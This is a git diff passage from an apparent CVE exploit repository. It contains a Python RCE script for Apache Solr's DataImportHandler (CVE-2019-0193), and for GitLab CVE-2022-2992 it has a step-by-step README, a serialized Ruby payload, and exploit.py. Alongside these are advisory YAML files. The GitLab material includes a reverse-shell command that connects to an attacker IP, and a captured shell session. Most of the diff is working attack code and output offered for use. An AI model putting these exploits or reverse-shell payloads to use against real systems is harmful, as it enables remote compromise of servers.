"command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + + print "Send Poc Success!" + else: + print "No Send Poc Success!" + print r3.text + + + +if __name__ == '__main__': + cmd = sys.argv[2] + url = sys.argv[1] admin_cores(url,cmd) \ No newline at end of file diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md index a19fa0a1ac94ab8a12c5b40c2811c3dd802643ca..655c6d935225d7551778f166feb6be0008dab8a1 100644 --- a/cve/apache-solr/2019/CVE-2019-0193/README.md +++ b/cve/apache-solr/2019/CVE-2019-0193/README.md @@ -1,9 +1,9 @@ -# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12) - -## 描述 - -Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。 - -## 用法 - +# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12) + +## 描述 + +Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。 + +## 用法 + ```python CVE-2019-0193.py http://192.168.2.18:8983 "calc"``` \ No newline at end of file diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml index a3f83d640f79731f2b04147de481cd64fabc1d7f..35ac0fe48b2bc7728c5ef27c3b2719422c248f63 100644 --- a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml +++ b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml @@ -1,40 +1,40 @@ -id: CVE-2019-0193 -source: https://github.com/jas502n/CVE-2019-0193 -info: - name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high - description: - 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。 - scope-of-influence: - Apache Solr < 8.2.0 - reference: - - https://issues.apache.org/jira/browse/SOLR-13669 - - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E - - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E - - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E - - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E - - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E - - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E - - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html - - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-0193 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: 对生成代码的控制不恰当, 代码注入 +id: CVE-2019-0193 +source: https://github.com/jas502n/CVE-2019-0193 +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: high + description: + 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。 + scope-of-influence: + Apache Solr < 8.2.0 + reference: + - https://issues.apache.org/jira/browse/SOLR-13669 + - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E + - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E + - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E + - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E + - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html + - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2019-0193 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: 对生成代码的控制不恰当, 代码注入 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/README.md b/cve/apache-tomcat/2020/CVE-2020-13935/README.md old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-tomcat/2020/CVE-2020-13935/go.mod old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-tomcat/2020/CVE-2020-13935/go.sum old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/main.go b/cve/apache-tomcat/2020/CVE-2020-13935/main.go old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go b/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/README.md b/cve/apache-tomcat/2022/CVE-2022-29885/README.md old mode 100755 new mode 100644 diff --git a/cve/docker/2023/yaml/CVE-2022-37708.yaml b/cve/docker/2023/yaml/CVE-2022-37708.yaml index 85eb7605ee4a9388402e254b99907b734df7f7b6..e1b6e56dfa086417b84b2deee57cfa6f4066f5ea 100644 --- a/cve/docker/2023/yaml/CVE-2022-37708.yaml +++ b/cve/docker/2023/yaml/CVE-2022-37708.yaml @@ -1,23 +1,23 @@ -id: CVE-2022-37708 -source: - https://github.com/thekevinday/docker_lightman_exploit -info: - name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 - severity: medium - description: | - Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 - scope-of-influence: - Docker 20.10.15, build fd82621 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-37708 - - https://www.docker.com/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708 - - https://github.com/orgs/docker/repositories - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N - cvss-score: 6.8 - cve-id: CVE-2022-37708 - cwe-id: CWE-732 - cnvd-id: None - kve-id: None +id: CVE-2022-37708 +source: + https://github.com/thekevinday/docker_lightman_exploit +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: medium + description: | + Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 + scope-of-influence: + Docker 20.10.15, build fd82621 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-37708 + - https://www.docker.com/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708 + - https://github.com/orgs/docker/repositories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 6.8 + cve-id: CVE-2022-37708 + cwe-id: CWE-732 + cnvd-id: None + kve-id: None tags: 未授权访问 \ No newline at end of file diff --git a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml index 11c4e937e25f37b131d0a635ee80c78ccd8a564a..588a5e374550ea6cc9de77248045a914b71b275d 100644 --- a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml +++ b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml @@ -1,20 +1,20 @@ -id: CVE-2020-10977 -source: https://github.com/thewhiteh4t/cve-2020-10977 -info: - name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 - severity: MEDIUM - description: | - GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。 - scope-of-influence: - 8.5.0 <= GitLab(CE/EE)< 12.9 - 8.5.0 <= GitLab(CE/EE)< 12.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-10977 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2020-10977 - cwe-id: CWE-22 - cnvd-id: None - kve-id: None +id: CVE-2020-10977 +source: https://github.com/thewhiteh4t/cve-2020-10977 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: MEDIUM + description: | + GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。 + scope-of-influence: + 8.5.0 <= GitLab(CE/EE)< 12.9 + 8.5.0 <= GitLab(CE/EE)< 12.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-10977 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2020-10977 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None tags: EE/CE, cve2020, gitlab \ No newline at end of file diff --git a/cve/gitlab/2022/CVE-2022-2992/README.md b/cve/gitlab/2022/CVE-2022-2992/README.md index 59776cd62898ecf3995ec4d507301dc4c67efde5..282e156ffd0359bb75eb4cd4d39f28c2c63f9c3f 100644 --- a/cve/gitlab/2022/CVE-2022-2992/README.md +++ b/cve/gitlab/2022/CVE-2022-2992/README.md @@ -1,97 +1,97 @@ -# CVE-2022-2992 -Authenticated Remote Command Execution in Gitlab via GitHub import. -> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. - -https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import - -## Prerequisites -- [Ngrok](https://ngrok.com/) -- Ruby -- Redis -- Python3 -- Flask -``` -sudo apt install ruby python3 python3-pip -gem install redis -pip install flask -``` ---- -## Steps -1) Run `./ngrok http 5000` and save the URL. -2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example: -```bash -ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"' -``` -3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example: -```py -PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve' -NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io' -``` -4) Create an access token for the user on gitlab and select all scopes. Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html) -5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py). - -**NOTE**: Before running make sure ngrok and flask server are running. -```py -python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example -``` -- We get a shell back on port 443 -```bash -➜ CVE-2022-2992: nc -nlvp 443 -listening on [any] 443 ... -connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270 -sh: 0: can't access tty; job control turned off -$ id -uid=998(git) gid=998(git) groups=998(git) -``` - ---- -### Expected output in each window: -- Ngrok -```http -POST /vakzz/public.git/git-upload-pack 200 OK -GET /vakzz/public.git/info/refs 200 OK -GET /api/v3/repos/fake/name 200 OK -GET /api/v3/repositories/12345 200 OK -GET /api/v3/rate_limit 200 OK -GET /api/v3/rate_limit 200 OK -``` -- Exploit -```py -[1] Creating Group -[+] Successfully created group: qogjohpykk -[2] Running flask server -[3] Importing Github Repo - * Serving Flask app "server" (lazy loading) - * Environment: production - WARNING: This is a development server. Do not use it in a production deployment. - Use a production WSGI server instead. - * Debug mode: off - * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit) -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 - -201 -127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 - -[4] Triggering Payload -[+] Command was executed -``` ---- - -## Environment -- Tested on Gitlab 15.3.1 Enterprise Edition -- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM. -- Run build.sh to setup the environment. Once the script finishes executing you can login using the following credentials on gitlab. -``` -Username: enox -Email: enox@gitlab.example -Password: StrongestGitlabPassword -``` ---- - -## Credits -- https://hackerone.com/reports/1679624 (vakzz) -- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html - -If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458) +# CVE-2022-2992 +Authenticated Remote Command Execution in Gitlab via GitHub import. +> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. + +https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import + +## Prerequisites +- [Ngrok](https://ngrok.com/) +- Ruby +- Redis +- Python3 +- Flask +``` +sudo apt install ruby python3 python3-pip +gem install redis +pip install flask +``` +--- +## Steps +1) Run `./ngrok http 5000` and save the URL. +2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example: +```bash +ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"' +``` +3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example: +```py +PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve' +NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io' +``` +4) Create an access token for the user on gitlab and select all scopes. Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html) +5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py). + +**NOTE**: Before running make sure ngrok and flask server are running. +```py +python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example +``` +- We get a shell back on port 443 +```bash +➜ CVE-2022-2992: nc -nlvp 443 +listening on [any] 443 ... +connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270 +sh: 0: can't access tty; job control turned off +$ id +uid=998(git) gid=998(git) groups=998(git) +``` + +--- +### Expected output in each window: +- Ngrok +```http +POST /vakzz/public.git/git-upload-pack 200 OK +GET /vakzz/public.git/info/refs 200 OK +GET /api/v3/repos/fake/name 200 OK +GET /api/v3/repositories/12345 200 OK +GET /api/v3/rate_limit 200 OK +GET /api/v3/rate_limit 200 OK +``` +- Exploit +```py +[1] Creating Group +[+] Successfully created group: qogjohpykk +[2] Running flask server +[3] Importing Github Repo + * Serving Flask app "server" (lazy loading) + * Environment: production + WARNING: This is a development server. Do not use it in a production deployment. + Use a production WSGI server instead. + * Debug mode: off + * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit) +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 - +201 +127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 - +[4] Triggering Payload +[+] Command was executed +``` +--- + +## Environment +- Tested on Gitlab 15.3.1 Enterprise Edition +- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM. +- Run build.sh to setup the environment. Once the script finishes executing you can login using the following credentials on gitlab. +``` +Username: enox +Email: enox@gitlab.example +Password: StrongestGitlabPassword +``` +--- + +## Credits +- https://hackerone.com/reports/1679624 (vakzz) +- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html + +If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458) diff --git a/cve/gitlab/2022/CVE-2022-2992/exploit.py b/cve/gitlab/2022/CVE-2022-2992/exploit.py index 63d30a441ced2534b054c21805a28b70d3559f0e..e59f5de0565e42caaaa4365bc64c67ac173e17d4 100644 --- a/cve/gitlab/2022/CVE-2022-2992/exploit.py +++ b/cve/gitlab/2022/CVE-2022-2992/exploit.py @@ -1,52 +1,52 @@ -import requests -import time -import random -import string -import argparse -import threading -from server import * - -parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via Github Import') -parser.add_argument('-a', help='Auth-Token', required=True) -parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True) -parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) -args = parser.parse_args() - -auth_token = args.a -gitlab_url = args.t -attacker_url = args.u - -session = requests.Session() - -print("[1] Creating Group") -group_name =''.join(random.choices(string.ascii_lowercase, k=10)) -headers = {'PRIVATE-TOKEN': auth_token} -data = {'name':group_name,'path':group_name,'visibility':'public'} -r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data) - -if r.status_code != 201: - print(r.text) - exit("Failed to create group, check your auth token.") -else: - print("[+] Successfully created group: "+group_name) - -print("[2] Running flask server") -def runserver(): - app.run(host='0.0.0.0', port='5000', debug=False) -t1 = threading.Thread(target=runserver) -t1.start() - -print("[3] Importing Github Repo") -data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url} -r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data) -print(r.status_code) -time.sleep(5) - -print("[4] Triggering Payload") -headers = {'Cookie':'_gitlab_session=gggg'} -r = session.get(gitlab_url+"/"+group_name, headers=headers) - -if r.status_code != 500: - exit("[-] Exploit failed") -else: - print("[+] Command was executed") +import requests +import time +import random +import string +import argparse +import threading +from server import * + +parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via Github Import') +parser.add_argument('-a', help='Auth-Token', required=True) +parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True) +parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) +args = parser.parse_args() + +auth_token = args.a +gitlab_url = args.t +attacker_url = args.u + +session = requests.Session() + +print("[1] Creating Group") +group_name =''.join(random.choices(string.ascii_lowercase, k=10)) +headers = {'PRIVATE-TOKEN': auth_token} +data = {'name':group_name,'path':group_name,'visibility':'public'} +r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data) + +if r.status_code != 201: + print(r.text) + exit("Failed to create group, check your auth token.") +else: + print("[+] Successfully created group: "+group_name) + +print("[2] Running flask server") +def runserver(): + app.run(host='0.0.0.0', port='5000', debug=False) +t1 = threading.Thread(target=runserver) +t1.start() + +print("[3] Importing Github Repo") +data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url} +r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data) +print(r.status_code) +time.sleep(5) + +print("[4] Triggering Payload") +headers = {'Cookie':'_gitlab_session=gggg'} +r = session.get(gitlab_url+"/"+group_name, headers=headers) + +if r.status_code != 500: + exit("[-] Exploit failed") +else: + print("[+] Command was executed") diff --git a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb index 62ec1228a6fb6b2b7f5af1f7f3310174dcd83ed6..a29e95a62ed5c09022d5b144683602a32a34df7e 100644 --- 